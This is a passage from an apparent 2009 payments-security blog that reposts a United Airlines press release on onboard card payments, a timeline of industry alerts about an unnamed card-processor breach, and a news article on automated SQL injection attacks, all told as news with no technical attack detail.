The victims often don’t want to come forward because they don’t want their names used, especially if they are married and the amounts are sometimes not comparatively very significant for the bank to aggressively seek action.

Reblog this post [with Zemanta]

United - No Cash..."Card Info"

In a Press Release from United Airlines, they announced No Cash...Visa!  So your Martini's, Dewars, Makers Mark and other in-flight purchases must be paid for with CASH only.

If the reasoning behind this is that they don't want their steward's to pocket cash, then they apparently are not aware of the potential danger this poses for their customers.   Hopefully people will be able to swipe their cards from their seat because it's highly unrecommended to hand over your card (and thus the Track 2 data on the magnetic stripe) to a waitress at a restaurant, let alone a waitress in the sky.  The opportunity, and thus temptation to "skim" the card information might be too great for some and the passenger can be taken a ride.


No Cash...Card

United Airlines introduces onboard credit/debit card acceptance beginning March 23

CHICAGO, Feb. 25 /PRNewswire-FirstCall/ -- United Airlines is making the search for exact change a thing of the past. With United's new EasyPurchase, customers will be able to use credit and debit cards for onboard purchases beginning March 23.

After a brief transition period through the spring break season, United will phase out cash and only accept credit and debit cards on flights within the United States (including Hawaii) and on flights to and from Canada, Mexico, Central America and the Caribbean.

United will continue to accept cash in addition to credit and debit cards on flights to and from Europe, Asia, the Middle East and South America.

On United Express flights, cash will continue to be the accepted form of payment.

"Our customers have responded very positively over the past year as we tested credit and debit card purchases on many flights including trans-continental routes," says Alex Marren, senior vice president - Onboard Service. "Whether customers want to enjoy an in-flight cocktail or a popular snackbox, our customers' purchases will soon be just a quick swipe away."

With EasyPurchase, customers will be able to use major credit cards, including Visa, MasterCard, American Express, Discover, and Diners Club, and debit cards bearing the Visa or MasterCard logos.

In addition, users of United Mileage Plus Visa cards from Chase will earn 10 miles for every dollar spent on in-flight purchases. Travelers who apply and are approved for a Chase Mileage Plus Visa card using the exclusive onboard application will earn 30,000 Mileage Plus bonus miles and receive $25 off their next United Airlines ticket, after their first purchase.

About United

United Airlines (Nasdaq: UAUA) operates more than 3,000* flights a day on United and United Express to more than 200 U.S. domestic and international destinations from its hubs in Los Angeles, San Francisco, Denver, Chicago and Washington, D.C. With key global air rights in the Asia-Pacific region, Europe and Latin America, United is one of the largest international carriers based in the United States. United also is a founding member of Star Alliance, which provides connections for our customers to 912 destinations in 159 countries worldwide. United's 49,500 employees reside in every U.S. state and in many countries around the world. News releases and other information about United can be found at the company's Web site at

*Based on United's flight schedule between Jan. 1, 2009, and Jan. 1, 2010.

SOURCE United Airlines

Reblog this post [with Zemanta]

Mystery Processor's Breach Timeline has released a comprehensive time-line on the Mystery Breach at one of our nation's prominent card processors.  Since the PIN Payments Blog has been following this closely,  we thought we'd share.  Kudos to for putting this together in a clear and concise way...

2009-02-26 by d2d

Here's a timeline of what we've seen surrounding this vaguely disclosed breach. First, some terms:

CAMS: This is an acronym for a Visa implemented system, the "Compromised Account Management System". Alerts are distributed via this system to banks and other financial institutions to facilitate card reissuing and fraud detection. Mastercard also issues similar alerts.

Card Not Present: This term means exactly what you think it does. The card was not physically present during the transaction. This is typical in online shopping, telephone sales, etc.

UPDATE | February 11th, 2009: VISA blasts out a CAMS notice, which has been contributed to OSF anonymously:

"Date: February 11, 2009 Entity Type: Acquirer Processor - Fraud Reported: Yes, elevated fraud rates on this event Visa Fraud Control & Investigations has been notified of a confirmed network intrusion that may have put Visa account numbers at risk. The reported incident involves confirmed unauthorized access to a U.S. acquirer processors settlement system of stored transaction information that included Primary Account Numbers (PANs) and expiration dates. No magnetic stripe track data has been identified at risk in this alert. Fraud analysis has revealed elevated card-not-present fraud rates on this incident. Even though it is not known if any account information was actually removed during the intrusion, we must still consider the data to be at risk because of the elevated fraud. Based on the forensic investigative findings, the entity began storing PANs and expiration dates in February 2008. The forensic investigation is ongoing. Any new material information will be provided in a CAMS update to better assist you with fraud and risk mitigation."

February 11th, 2009: Fiserv blasted out this alert to their customers (banks, credit unions, processors, etc). We were tipped on this by multiple sources. The statement reads:

"The Risk Office Team has received information from Visa and MasterCard regarding the confirmed compromise of a U.S.-based acquirer processor. Please note that the compromised card alerts for this event are not related to the Heartland Data Systems’ breach. Given that confirmation of the Heartland breach and this new compromise occurred in such close proximity, it’s possible that the same card numbers could appear on compromised card lists associated for both events. You may wish to take this into consideration as you execute your organization’s monitoring and/or reissue plans for recently compromised cards."

February 12th, 2009: The Community Bankers Association of Illinois posts a notice that included the following:

"Today, VISA announced that an unnamed processor recently reported that it had discovered a data breach. The processor’s name has been withheld pending completion of the forensic investigation..."

Between 2-11 and 2-13: The Tuscaloosa Federal Credit Union releases a notice regarding the incident that reads:

"On the heels of the Heartland Payment Systems breach, another U.S. acquirer-processor has confirmed a network intrusion exposing primary card numbers and card expiration dates for card-not-present (CNP) transactions. Unlike the Heartland Payment breach, this breach does not expose magnetic stripe track data. The reported incident involves confirmed unauthorized access to a U.S. acquirer processor’s settlement system of stored transaction information that included Primary Account Numbers (PANs) and expiration dates. As the entity involved has not yet issued a press release, Visa and MasterCard are unable to release the name of the merchant processor. It is important to note that this event is not related to the Heartland Payment Systems breach."

February 13th, 2009: The Independent Community Bankers of America releases this on their website:

"ICBA learned of another security breach involving a merchant processor. The breach appears to be large, but not as large or severe as the recent breach at Heartland Payment Systems. The name of the breached processor is unknown at this time, but ICBA knows that: All accounts and all brands were equally exposed; however, only card numbers and expiration dates were captured. No track data was captured. Because there is no evidence of skimming counterfeit and all known fraudulent transactions have been key entered, Visa's ADCR program will not cover losses. However, compliance and “card not present” (depending on status of VbyV/SecureCode) chargeback rights should apply. MC issuers must file via compliance as they always do. Alerts for this new incident are being reported under Visa series US-2009-088 and MasterCard series MCA0150-US-09."

February 13th, 2009: The Pennsylvania Credit Union Association released this statement which we've retrieved from google cache, as the content of the old notice is now displaying a new notice about something else. The old notice read:

"Earlier this week, Visa and MasterCard began issuing accounts involved in a merchant processor breach. The reported incident involves confirmed unauthorized access to a U.S. acquirer processor̢۪s settlement system of stored transaction information that included Primary Account Numbers (PANs) and expiration dates. No magnetic stripe track data has been identified at risk in this alert. As the entity involved has not yet issued a press release, Visa and MasterCard are unable to release the name of the merchant processor. It is important to note that this event is not related to the Heartland Payment Systems breach. While it has been confirmed that malicious software was placed on the processor̢۪s platform, there is no forensic evidence that accounts were viewed or taken by the hackers. Since the final forensic report has not been provided there is no estimate available at this time of the number of accounts involved in this event. Law enforcement is activity engaged in an investigation into this situation. Visa began releasing affected accounts on Monday, February 9, 2009 under CAMS event series US- 2009-0088-IC. They expect to have all accounts released by Friday, February 13. MasterCard began releasing accounts on Wednesday, February 11, 2009 under MC Alert series MCA0150-US-09. They have not provided any information as to when they expect to have all their accounts released. The current window of exposure provided by both card associations is from February 2008 through January 2009. The only data elements at risk are account number and expiration date. No track data, PIN, CVV2/CVC2 data or cardholder-identifying information was captured. As in all events, it is the issuer̢۪s decision whether or not a block and/or reissue decision is warranted. However, we would like to emphasize that this event carries a lower level of risk than the Heartland compromise."

February 13th, 2009: We posted a blog entry regarding what we've been hearing from tipsters, who are usually dead on about these things, but we did so only after corroborating that the tips we'd heard we're also being heard by others.

February 17th, 2009: The Alabama Credit Union posts a notice on their website that reads:

"Alabama Credit Union has been notified by VISA that some members' VISA credit card information may have been discovered during a breach at a card processor's site. VISA has not named the card processor."

February 17th, 2009: The Bankers' Bank of Kansas posts a notification which reads:

" Two large data compromises affecting credit and debit cards were announced the weeks of 1/21/09 and 2/09/09. BBOK BankCard actively monitors all alerts from Visa®, MasterCard®, and our processor for compromised card data...."

February 19th, 2009: The Alabama Credit Union follows up on their initial reporting with an update indicating how fraud is being committed as a result of this new breach, and it contains the following:

We have been notified by VISA that a lengthy list of VISA ATM/Debit Card numbers was included as part of a data breach at an unknown vendor's location. VISA has declined to name the vendor or processor. The fraudulent transactions are primarily characterized as purchases of prepaid phone cards, prepaid gift cards, and money orders from Wal-Mart, and usually occur in $100 increments.

February 22nd, 2009: We posted a follow-up to our original story, with new information (some of the above timeline items) gathered from

February 24th, 2009: News reports are released about St. Mary's Credit Union receiving notification regarding this breach. The article writes:

"A breach of a credit card processing system at St. Mary's Credit Union yesterday affected up to 4,300 customers and likely cost the business more than $20,000....The credit union does not know the name of the processing system, but Battista said the breach likely affected people across the country..."

End of Timeline

This is what we know. Of course, there is a lot of speculation as to who the unnamed is. Our mailboxes here are on fire with speculation, and you can read the comments on some of our previous posts on the topic to see examples of it. We have no solid information regarding who the affected organization is. We do know that we've had two other major breaches recently involving this type of data, namely: RBS Worldpay and Heartland Payment Systems. We also know that in a statement to the consumerist, Visa and Heartland is adamant that this new breach was not them.

Ultimately, I think the banks will demand to know, considering the costs are mostly their burden to bear. But in the meantime, we wait.

Reblog this post [with Zemanta]

500,000 Websites Hit by SQL Injection in '08

darkReading says that SQL Injection hit 500,000 Websites last year:

Report: More Than 500,000 Websites Hit By New Form Of SQL Injection In '08
New Web breach incident report finds the bad guys deploying more automated attacks, targeting customers rather than data on sites

Feb 25, 2009 | 02:52 PM
By Kelly Jackson Higgins

A new flavor of an old-school Web attack was responsible for compromising more than 500,000 Websites last year.

An automated form of SQL injection using botnets emerged as the popular method of hacking Websites, according to a newly released report from the Web Hacking Incidents Database (WHID), an annual report by Breach Security and overseen by the Web Application Security Consortium (WASC). The report also found that attackers increasingly are targeting a Website's customers rather than the sensitive information in the site's database.

"It used to be that mostly e-commerce sites were targeted, but now it's potentially any site, especially those with a large customer base," says Ryan Barnett, director of application security research for Breach Security. "The attackers say, 'You're going to become a malware-launching point for us.'"

The so-called Mass SQL Injection Bot attacks basically automate the infection process; the Nihaorr1 and Asprox botnets both deployed this method last year, according to the report. "In the past, they had to do some manual reconnaissance with SQL injection to send the initial queries," Barnett says. The automated approach sent one request with a script that automated all of those recon steps -- using bots to perform the attacks.

"While the initial attack vector was SQL Injection, the overall attack more closely resembles a Cross-Site Scripting methodology as the end goal of the attack was to have malicious JavaScript execute within victims' browsers," the WHID reports says. "The JavaScript calls up remote malicious code that attempts to exploit various known browser flaws to install Trojans and Keyloggers in order to steal login credentials to other web applications."

Continue "darkReading"

Reblog this post [with Zemanta]

Disqus for ePayment News